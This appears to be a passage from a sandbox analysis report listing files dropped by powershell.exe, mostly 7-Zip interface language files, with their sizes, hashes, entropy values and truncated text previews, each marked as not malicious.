                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 2.30 : Soeren Finster..; 4.07 : JAK-Software.DE..; 9.07 : Joachim Henke..;..;..;..;..;..;..;..;..0..7-Zip..German..Deutsch..401..OK..Abbrechen........&Ja..&Nein..&Schlie.en..Hilfe....&Fortsetzen..440..Ja f.r &alle..Nein f.r a&lle..Stopp..Neustart..&Hintergrund..&Vordergrund..&Pause..Pause..M.chten Sie wirklich abbrechen?..500..&Datei..&Bearbeiten..&Ansicht..&Favoriten..&Extras..&Hilfe..540...&ffnen..I&ntern .ffnen..E&xtern .ffnen..&Ansehen..&Bearbeiten..&Umbenennen..&Kopieren nach.....&Verschieben nach.....&L.schen..Datei auf&splitten.....Dateien &zusammenf.gen.....E&igenschaften..K&ommentieren..&Pr.fsumme berechnen..Ver&gleichen..Ordner erstellen..Datei erstellen..Be&enden..Verkn.pfung.....&Alternative Datenstr.me..600..Alles &markieren..Alles abw.hlen..Markierung &umkehren..Ausw.hlen.....Auswahl aufheben.....Nach Typ ausw.hlen..Nach Typ abw.hlen..700..&Gro.e Symbole..&Kleine Symbole..&Liste..&Details..730..Unsortiert..Alles in einer &Ebene..
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17042
                                                                                                                                                          Entropy (8bit):4.484854048361814
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:iZF/smolE2pHjN6ZdrD2zH9bOrcjfnicC5aLoDNwSF:wNIEZRD2R5jfnic+aLoBwSF
                                                                                                                                                          MD5:812DF218DAE08F9F883A7455015707B2
                                                                                                                                                          SHA1:6E7D7D1C8E783B9B913F44DF515F4D376D3502C4
                                                                                                                                                          SHA-256:CF90A21C69A13E0D674B6B74E2904F7D9D3BEE594D89862155D94105311F47A7
                                                                                                                                                          SHA-512:51C3C6151B47FA5E3968604CC2385C5D0984CCB96B8F92982BD28440786E1B99826AA70AE1232465A3469DDB6C50D13A241B6A979387EB47BFF013953DB1ED07
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Vasileios Karakoidas, Jacaranda Bill, Vasilis Kosmidis..; 9.07 : SkyHi [HDManiacs Team]..; 15.00 : 2015-05-07: Pete D..;..;..;..;..;..;..;..;..0..7-Zip..Greek............401..OK...............&......&....&.....................&..........440..... .. &........ .. .&....&........................ &............... &...........&..................... ........ ... ...... .. .........;..500..&........&..............&...........&............&......&.........540....&.............. ... &.... ................. .. &... ...........&...........&............&...............&..............&.................&....&.......... ............&........ .....
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7622
                                                                                                                                                          Entropy (8bit):5.026870141064363
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iZ76FtmZSw5U0LutH5EVCPXUoDzg3TMHig7v7iH+xb:iZnKtH5EVC/U2zg34Cg7Hb
                                                                                                                                                          MD5:8D7264236ADCA0407FA61D942B7E575E
                                                                                                                                                          SHA1:21861F62751D2E3D452146BA139E758F20DA6F6C
                                                                                                                                                          SHA-256:628366CBE1964564F8BCD0732ABFE08CC3F9A86FE761E41ABB41F84F7B6BA00A
                                                                                                                                                          SHA-512:74AB8E70FC3A685AE715368DF90E9F6B9630E6DC1091436C244AD486DB3FAF25BC59AC1B89F90E935E7EB2C6766E19165032FC24824AD8AF932AD95A8A34172B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.00 : 2015-03-29 : Igor Pavlov..;..;..;..;..;..;..;..;..;..;..0..7-Zip..English..English..401..OK..Cancel........&Yes..&No..&Close..Help....&Continue..440..Yes to &All..No to A&ll..Stop..Restart..&Background..&Foreground..&Pause..Paused..Are you sure you want to cancel?..500..&File..&Edit..&View..F&avorites..&Tools..&Help..540..&Open..Open &Inside..Open O&utside..&View..&Edit..Rena&me..&Copy To.....&Move To.....&Delete..&Split file.....Com&bine files.....P&roperties..Comme&nt.....Calculate checksum..Diff..Create Folder..Create File..E&xit..Link..&Alternate Streams..600..Select &All..Deselect All..&Invert Selection..Select.....Deselect.....Select by Type..Deselect by Type..700..Lar&ge Icons..S&mall Icons..&List..&Details..730..Unsorted..Flat View..&2 Panels..&Toolbars..Open Root Folder..Up One Level..Folders History.....&Refresh..Auto Refresh..750..Archive Toolbar..Standard Toolbar..Large Buttons..Show Buttons Text..800..&Add folder to Favorites as..Bookmark..90
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9797
                                                                                                                                                          Entropy (8bit):4.960723234256232
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i3vSP1uIlLvt2WSBL7hBC2pjlRS03gyLuBODltrO9K:i3KPUIlrt29BdGK
                                                                                                                                                          MD5:5A449308A0176D6401181BEF4AF13765
                                                                                                                                                          SHA1:9D8BC3E801BCFB43C7DBFAB94AB91A4079A2070F
                                                                                                                                                          SHA-256:7DDDAE25296F14C1F45AC032D9C950C3A8D39A41489F9D2B06000EDCFA7A6660
                                                                                                                                                          SHA-512:2AEBD25219B12D88BDF7A4A1B90B6B13B4ED5D4215E15D2316494C56B7D696EEB3252478200BCF0D84160D11979F5A71C72CA110DD3E28E901CFDB13255C45B0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Pablo Rodriguez..; : Jbc25..; : 2007-09-05 : Guillermo Gabrielli..; 9.07 : 2010-06-10 : Purgossu..; 2010-10-23 : Sergi Medina (corrected) ..; 18.00 : 2018-01-10 : Agust.n Bou (updated)..;..;..;..;..;..0..7-Zip..Spanish..Espa.ol..401..Aceptar..Cancelar........&S...&No..&Cerrar..Ayuda....&Continuar..440..S. a &todo..No a t&odo..Parar..Volver a empezar..Se&gundo plano..P&rimer plano..&Pausa..Pausado...Est.s seguro de que deseas cancelar?..500..&Archivo..&Editar..&Ver..&Favoritos..&Herramientas..Ay&uda..540..&Abrir..Abrir &dentro..Abrir &fuera..&Ver..&Editar..Re&nombrar..&Copiar a.....&Mover a.....&Borrar..Di&vidir archivo.....C&ombinar archivos.....&Propiedades..Comen&tario..Suma de verificaci.n..Diff..Crear carpeta..Crear archivo..&Salir..Vincular..Flujos &alternativos..600..Seleccionar &todo..Deseleccionar todo..&Invertir selecci.n..Seleccionar.....Deseleccionar.....Seleccionar por tipo..Deseleccionar
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7214
                                                                                                                                                          Entropy (8bit):5.0177575463645425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.09 : Kaupo Suviste..; 9.07 : Mihkel T.nnov..;..;..;..;..;..;..;..;..;..0..7-Zip..Estonian..eesti keel..401..OK..Loobu........&Jah..&Ei..&Sulge..Abi....&J.tka..440..K.igile j&ah..K.igile e&i..Seiska..Restardi..&Taustal..&Esiplaanile..&Paus..Pausiks peatatud..Kas soovite kindlasti loobuda?..500..&Fail..&Redigeeri..&Vaade..&Lemmikud..&T..riistad..&Abi..540..&Ava..Ava s&ees..Ava v.ljasp&ool..Vaat&ur..&Redigeeri..&Nimeta .mber..&Kopeeri asukohta.....&Teisalda asukohta.....Ku&stuta..T.kel&da fail......&henda failid.....Atri&buudid..Ko&mmentaar.....Arvuta kontrollsumma..V.rdle..Loo kaust..Loo fail..&V.lju..600..V&ali k.ik..T.hista k.ik valikud..&P..ra valik..Vali.....T.hista valik.....Vali t..bi j.rgi..T.hista t..bi j.rgi valik..700..&Suured ikoonid..V.ik&esed ikoonid..&Loend...ksikasja&d..730..Sortimata..Lame vaade..&Kaks paani..&T..riistaribad..Ava juurkaust..Taseme v.rra .les..Kaustaajalugu.....&V.rskenda..750..Arhiiviriistariba..S
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8894
                                                                                                                                                          Entropy (8bit):4.789524765462384
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.12 : 2015-12-04 : Xabier Aramendi..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Basque..Euskara..401..&Ongi..E&zeztatu........&Bai..&Ez..It&xi..&Laguntza....&Jarraitu..440..Bai &Guztiari..Ez G&uztiari..Gelditu..Berrabiarazi..Ba&rrenean..&Gainean..&Pausatu..Pausatuta..Zihur zaude ezeztatzea nahi duzula?..500..&Agiria..&Editatu..&Ikusi..&Gogokoenak..&Tresnak..&Laguntza..540..&Ireki..Ireki &Barnean..Ireki &Kanpoan..Ik&usi..&Editatu..Berrize&ndatu..Kopiatu &Hona.....&Mugitu Hona.....E&zabatu..Banan&du agiria.....Nahas&tu agiriak.....Ezau&garriak..&Aipamena.....Ka&lkulatu egiaztapen-batura..Ezber..Sortu Agiritegia..S&ortu Agiria..I&rten..Lotura..&Aldikatu Jarioak..600..Hautatu &Guztiak..Deshatutau G&uztiak..&Alderantzizkatu Hautapena..&Hautatu.....&Deshautatu.....Hautatu &Motaz..Deshautatu M&otaz..700..Ikur &Handiak..Ikur Txi&kiak..&Zerrenda..&Xehetasunak..730..Ant&olatugabe..Ik&uspegi Laua..&2 Panel..&Tresnabarrak..Ireki &Erro Agiritegia..Maila Bat &Gora..Agiritegi &H
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7791
                                                                                                                                                          Entropy (8bit):5.01233595181642
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Miguel Angel..; 9.07 : Purgossu..;..;..;..;..;..;..;..;..;..0..7-Zip..Extremaduran..Estreme.u..401..Acetal..Cancelal........&S...&Nu..&Fechal..Ayua....A&continal..440..S. &a t...Nu a &t...Paral..Reinicial..Se&gundu pranu..&Primel pranu..&Paral..Parau..De siguru que quieri cancelal la operaci.n?..500..&Archivu..&Eital..&Vel..A&tihus..&Herramientas..A&yua..540..&Abril..Abril &dentru..Abril &huera..&Vel..&Eital..Renom&bral..&Copial a.....&Movel pa.....&Eliminal..De&sapartal ficheru.....Com&binal ficherus.....P&ropieais..Come&ntariu..Calculal suma e verificaci.n..Diff..Creal diret.riu..Creal ficheru..&Salil..600..Selecional &t...Deselecional t...&Invertil seleci.n..Selecional.....Deselecional.....Selecional pol tipu..Deselecional pol tipu..700..Iconus g&randis..Iconus caquerus..&Listau..&Detallis..730..Nu soportau..Vista prana..&2 panelis..Barra e herramien&tas..Abril diret.riu ra...Subil un nivel..Estorial de diret.rius.....&Atualizal..750..Ba
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10768
                                                                                                                                                          Entropy (8bit):4.471491018171749
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.12 : Edris Naderan..; 4.53 : Mehdi Farhadi..; 9.22 : Hessam Mohamadi..;..;..;..;..;..;..;..;..0..7-Zip..Farsi.........401.......................&...&............................440..... ... ....... ... ...................... .......... ....................... ........ ...... .. ... .........500................................. .....................540.................. .. ............. .. ................................... ............. ................. .............. ............................... ..... ...... .......... ......... ........... ............600........ ........ ....... ........... .....................
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8719
                                                                                                                                                          Entropy (8bit):4.854557956353677
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.08 : Ari Ryynanen..; 4.30 : Jarko P...; 4.42 : Juhani Valtasalmi..; 9.35b : T.Sakkara..; 15.05 : 2015-08-07 : Lauri Kentt...; (19.00): 2020-12-28 : Sampo Hippel.inen..;..;..;..;..;..0..7-Zip..Finnish..Suomi..401..OK..Peruuta........&Kyll...&Ei..&Sulje..Ohje....&Jatka..440..Kyll. k&aikkiin..E&i kaikkiin..Pys.yt...Aloita uudelleen..Aja &taustalla..Aja &edustalla..&Tauko..Tauolla..Peruutetaanko toiminto?..500..&Tiedosto..&Muokkaa..&N.yt...&Suosikit..Ty.&kalut..&Ohje..540..&Avaa..Avaa s&is.isesti..Avaa ulkoisesti..&N.yt...&Muokkaa..Nime. &uudelleen..&Kopioi.....&Siirr......&Poista..&Jaa osiin.....&Yhdist. jaetut.....&Ominaisuudet..Ku&vaus..Laske tarkiste..Erot..Luo kansio..Luo tiedosto..&Lopeta..Linkit...Vaihtoehtoiset virrat..600..V&alitse kaikki..Poista &valinnat..&K..nteinen valinta..Valitse.....Poista valinta.....Valitse tyypeitt.in..Poista valinta tyypeitt.in..700..Suu&ret kuvakkeet..&Pienet kuvakkeet..&Luettelo..&Tiedot..730..Alkuper.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9910
                                                                                                                                                          Entropy (8bit):4.9823070549494775
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.07 : Nicolas Sierro..; 9.07 : Philippe Berthault..; 15.14 : Sylvain St-Amand (SSTSylvain)..;..;..;..;..;..;..;..;..0..7-Zip..French..Fran.ais..401..OK..Annuler........&Oui..&Non..&Fermer..Aide....&Continuer..440..Oui pour &Tous..Non pour T&ous..Arr.ter..Red.marrer..&Arri.re-plan..P&remier plan..&Pause..En pause...tes-vous sur de vouloir annuler ?..500..&Fichier..&.dition..Affic&hage..Fa&voris..&Outils..&Aide..540..&Ouvrir..Ouvrir . l'&int.rieur..Ouvrir . l'e&xt.rieur..&Voir..&.dition..Reno&mmer..&Copier vers.....&D.placer vers.....S&upprimer..Diviser le &fichier.....Combiner les fic&hiers.....P&ropri.t.s..Comme&ntaire.....Somme de contr.le..Diff..Cr.er un dossier..Cr.er un fichier..&Quitter..Lien..Flux &Alternatif..600..S.lectionner &Tout..D.s.lectionner Tout..&Inverser la S.lection..S.lectionner.....D.s.lectionner.....S.lectionner par Sorte..D.s.lectionner par Sorte..700..&Grandes Ic.nes..&Petites Ic.nes..&Liste..&D.tails..730..
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7679
                                                                                                                                                          Entropy (8bit):5.006541518255033
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.60 : Andrea Decorte (Klenje) : http://softfurlan.altervista.org : secont l'ortografie ufici.l de Provincie di Udin..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Friulian..Furlan..401..Va ben..Scancele........&S...&No..&Siare..&Jutori....&Continue..440..S. &a ducj..No a &ducj..Ferme..Torne a invi...&Sfont..P&rin plan..&Pause..In pause..S.stu sig.r di vol. scancel.?..500..&File..&Modifiche..&Viodude..&Prefer.ts..&Imprescj..&Jutori..540..&Viar...Viar. dentri 7-&Zip..V&iar. f.r di 7-Zip..&Mostre..M&odifiche..Gambie &non..&Copie in.....M.&f in.....&Elimine..&Div.t file.....Torne a &un. files.....P&ropiet.ts..Comen&t..Calcole so&me di control....Cree cartele..Cree file..V&a f.r..600..Selezione d&ut..&Deselezione dut..&Invert.s selezion..Selezione.....Deselezione.....Selezione par gjenar..Deselezione par gjenar..700..Iconis &grandis..Iconis &pi.ulis..&Liste..&Detais..730..Cence ordin..Viodude plane..&2 panei..Sbaris dai impresc&j..Viar. cartele princi
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6498
                                                                                                                                                          Entropy (8bit):5.016824364093303
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.53 : Berend Ytsma..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Frisian..Frysk..401..Okee..Ofbrekke........&Jawis..&Nee..&Slute..Help....&Ferfetsje..440..Jawis foar &Alles..Nee foar A&lles..Stopje..Opnij begjinne..&Eftergr.n..&Foargr.n..&Skoftsje..Skoft..Binne jo wis dat jo .fbrekke wolle?..500..&Triem..&Bewurkje..&Byld..B&l.dwizers..&Ark..&Help..540..&Iepenje..Iepenje &yn..Iepenje b.&ten..&Byld..&Bewurkje..Omne&ame..&Kopiearje nei.....&Ferpleats nei.....&Wiskje..Triemmen &spjalte.....Triemmen Kom&binearje.....E&igenskippen..Komme&ntaar..Kontr.lesom berekenje....Map meitsje..Triem meitsje..U&tgong..600..&Alles selektearje..Alles net selektearje..&Seleksje omdraaien..Selektearje.....Net selektearje.....Selektearje neffens type..Net selektearje neffens type..700..Gru&tte Ikoanen..L&ytse Ikoanen..&List..&Details..730..Net Sortearre..Platte werjefte..&2 Panielen..&Arkbalke..Haadmap iepenje..Ien nivo omheech..Maphistoarje.....&Ferfarskje..750..Argyf arkbalke..Stan
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8394
                                                                                                                                                          Entropy (8bit):4.904288029664947
                                                                                                                                                          Encrypted:false
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Sean.n . Coist.n..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Irish..Gaeilge..401..T. go maith..Cealaigh........&T...&N.l..&D.n..Cabhair....&Lean ar aghaidh..440..T. do gach ceann..N.l go gach ceann..Stad..Atosaigh..&C.lra..&Tulra..&Cuir ar sos..Ar sos..An bhfuil t. cinnte gur mian leat . a cheal.?..500..&Comhad..&Leagan..Am&harc..Cean.in..&Uirlis...&Cabhair..540..&Oscail..Oscail &istigh..Oscail &lasamuigh..&Amharc..&Eagar..Athainmnigh..&Macasamhlaigh go.....&Bog go.....S&crios..Scar an comhad.....Cumascaigh na comhaid.....Air.onna..N.ta tr.chta..R.omh an tsuim sheice.la..Diff..Cruthaigh fillte.n..Cruthaigh comhad..&Scoir..600..Roghnaigh &uile..D.roghnaigh uile..&Aisiompaigh an roghn.ch.n..Roghnaigh.....D.roghnaigh.....Roghnaigh de r.ir cine.l..D.roghnaigh de r.ir cine.l..700..&Deilbh.n. m.ra..&Deilbh.n. beaga..&Liosta..&Sonra...730..Neamhaicmithe..Gach rud in aon chiseal..&2 fhuinneog..&Barra. na n-uirlis...Oscail an fr.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9246
                                                                                                                                                          Entropy (8bit):4.956252479946546
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iObNz5MsaqwKlr7UdusuTcaHAB9yVU8SqSd6W5rnuc+Yvy36rV:iOV5jaqwKlr7Ud+LgB9yVdOnuca6rV
                                                                                                                                                          MD5:492E51B4B5B287FE2B90A5F0BD433847
                                                                                                                                                          SHA1:F7E1EBA770D3D07D0E8C2BD61D556508EF0578B8
                                                                                                                                                          SHA-256:54F676333CE58AF67B839B0F0470F99F405B5CE7FDB9C345A19D00B6423277E5
                                                                                                                                                          SHA-512:0AA1DF55256324B24B495543E4ABBEFD776108BDD90D3155D02B1C10F018BDBD1700C4430848DFBD5073A374715F8510EFB17AE1812A9AA44B65E50EDB23DE59
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.00 : 2016-02-01 : enfeitizador..;..; 9.20 : 2014-11-26 : enfeitizador..;..; 3.12 : 2007-11-22 : Xos. Calvo..;..;..;..;..;..;..0..7-Zip..Galician..Galego..401..De acordo..Cancelar........&Si..&Non..Pe&char..Axuda....&Continuar..440..Si &a todo..Non a &todo..Parar..Reiniciar..Po.er por de&baixo..Traer ao &fronte..&Pausa..Pausado..Ten a certeza de querer cancelar?..500..&Ficheiro..&Editar..&Ver..F&avoritos..Ferramen&tas..A&xuda..540..&Abrir..Abrir &dentro..Abrir &fora..&Ver..&Editar..Rena&me..&Copiar a.....&Mover a.....&Eliminar..&Dividir ficheiro.....Com&binar ficheiros.....P&ropiedades..Come&ntario.....Calcular suma de verificaci.n..Diferenzas..Crear cartafol..Crear ficheiro..Sa&.r..Ligaz.n..&Alternar fluxos..600..Seleccion&ar todo..Desmarcar todo..&Inverter selecci.n..Seleccionar.....Desmarcar.....Seleccionar por tipo..Desmarcar por tipo..700..Iconas lon&gas..Iconas &mi.das..&Lista..&Detalles..730..Sen orde..Vista plana..&2 paneis..Barras de ferramen&
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18258
                                                                                                                                                          Entropy (8bit):3.927118615474052
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:iyxKBXaWdxmWpk2x8QL/XwxD92K+R5+Twk292Bh72/OXMQH12fdvKA52hJV22b2o:FKBz5Cw+wvKAQco
                                                                                                                                                          MD5:410C8A33C66B4B2BC707E113D9C76914
                                                                                                                                                          SHA1:81A9F3618168DBECF309907EE74591AC3B1297B6
                                                                                                                                                          SHA-256:9025D8A58E0C76B186C943EF8A73A1BBA6C08945E346DE14D3C255CCFA3A10E6
                                                                                                                                                          SHA-512:A520CF2DC7E9F653BB08C93C657CB8E2D1142E86C3E0BACC44457CBA5EDE044E91FF01F55139C5AEB7B3F26E51724931EA2B2BB20A058C4B9D888A3AE8766021
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Vinayy Sharrma : .... ..... ...... ........ ..... ..... .. .. ....... ... ....... .... ..... .... ..... .. .... ..., .. ..... ! .. ...... ! .. .... ...... ! .. .........;..;..;..;..;..;..;..;..;..;..0..7-Zip..Gujarati, Indian, ......................401.....................&.....&....&... ............&.... ......440..&... .... .....&... .... .............. .... .....&............&........(.........)..&...................... .... .... .... ... ...
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):127834
                                                                                                                                                          Entropy (8bit):4.853527099518656
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:MSeD15QWmU6XrlH/piG5Bnm3XTnZ2F2j9V:MSeD15KPXrlH/piG5BnOXTnZ2F2j9V
                                                                                                                                                          MD5:209974550CC2A835F1879995851B424A
                                                                                                                                                          SHA1:F09850B9E7FFFCE197E362B9562CD0FF1C5C71ED
                                                                                                                                                          SHA-256:CA440D0128B62E35333730C5925992AE5B4B05A37C10105A9145EB5CF7A77071
                                                                                                                                                          SHA-512:4AB857ADEAB0E45F03868D1208D8F3250BBE27C5854BBC885E94E7E6ED8BCF9BDB2FF5035BEBB1958B345ECADF244DCC433D760643EA544066B32F3F1E266276
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11405
                                                                                                                                                          Entropy (8bit):4.0009346955133775
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i3D58xnxi9MoO0EGp/SDB52RM/VtvQPyE7H/Y8vFzicYWrWxusvU3FXxaXbhNXf2:i3V8YdE0cP2RCVFQPyE7YcYGW9U3F490
                                                                                                                                                          MD5:1B53819F8D58FD734B5FD985756B557C
                                                                                                                                                          SHA1:8759783ADBD62C6F32511313BABB9D138FA0A150
                                                                                                                                                          SHA-256:DCD061A0A7B29F55FA28D4396F60881836C2DF07CD936412C476A7F149540CC4
                                                                                                                                                          SHA-512:B7F0A16D9D02434E7D1C619768DC1D67C163AD6630C19630C405B5934311C41B65918C61DD5F27555CF5CF629411D57FE2CE04FC6C99A2272D4689B69A078E73
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : peterg..; : Gal Brill..; 9.13 : 2010-04-30 : Jonathan Lahav..; 19.00 : 2020-05-01 : ION..;..;..;..;..;..;..;..0..7-Zip..Hebrew.........401..................&....&....&..............&......440.... .&...... &............... ......&.....&.......&.............?.. ... .... .... .... ......500..&......&.......&.......&.........&.......&.....540...&....... .&......... .&.....&.....&......&... ........&. .......&.. ....&........&. .......&... .......&.............&....... ..... ................... ........... ......&............&..... .........600..... &........ ..... .....&.... ................. .......... ... ........ .....
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):211379
                                                                                                                                                          Entropy (8bit):4.444505410677775
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:XkOxgTgcwfKSj33cdEVhk7ovrCEO/S/bBfvTHef+a7BKfzzrRE3b8RLljlxCYPhb:rOCi8R
                                                                                                                                                          MD5:FA034EB13D21CE4E9FC2D3EAFDF40CD2
                                                                                                                                                          SHA1:0992D91706D26B6CC2FF64D899308BA4E9380A35
                                                                                                                                                          SHA-256:1CA6A0546F9627FA9BA3D377D79A21FF26EC9B349D47247C9B241A70728D0699
                                                                                                                                                          SHA-512:4F8024F43A70D9D8AE67848E2540B028CF1B9183B7DEDD66043FB16394601DA986D695C8D28F072444A69C1B2639C8B79096065389069FB854D152DB166ED734
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18290
                                                                                                                                                          Entropy (8bit):3.9142884355450493
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:icNErTw7YtUD/xvVxkTTkjxQ10Up/ijaCXEk02VQGKFO8YeY:n601ao2hY
                                                                                                                                                          MD5:A0FC3C3D880A54918D86B40FFDA12F23
                                                                                                                                                          SHA1:34FB9F1B5A6731100466F66E193AB5028B3EC1BE
                                                                                                                                                          SHA-256:8CCE5E5A846196DAC3649483290160177F47D88A7DCF0E85ACFD3131856A266A
                                                                                                                                                          SHA-512:BD1F17D76699F177CE6DF4B69F82DFA777A0AE20E243D5FED0605FE951A79D8AE54371B07EB30F075161C108F46BE1CE21B162B66CC099C02ADB6EB6D5E8F158
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Vinayy Sharrma : ...... .... ..... ..... .. .. .. .... ... ..... .. ... ..... .. .. .... ...... .. .... ..., .. ..... ! .. ...... !..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Hindi, Indian, .....................401..... ................&.....&......&... ............&.... .....440..&... .. .... .....&... .. .... ................ .... ......&............&........(.........)..&....................... .... .... ..... ... ....... .... .. ....?..500..&......&
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):101535
                                                                                                                                                          Entropy (8bit):5.522777250626834
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:1JKdAGC/lemhlBExypakZUaO2sMMoLaz7v53Kkx9i:lHiKp
                                                                                                                                                          MD5:624BCE9B02382312F4588D3147B738A3
                                                                                                                                                          SHA1:8DF16C75C9E86A96D9F2B11E80EB182BA6C8EEF9
                                                                                                                                                          SHA-256:64E531E46CF5B644D1B7F1DF885EFCF51A65DB50FAB65AB250F5E4E1ADFA9D29
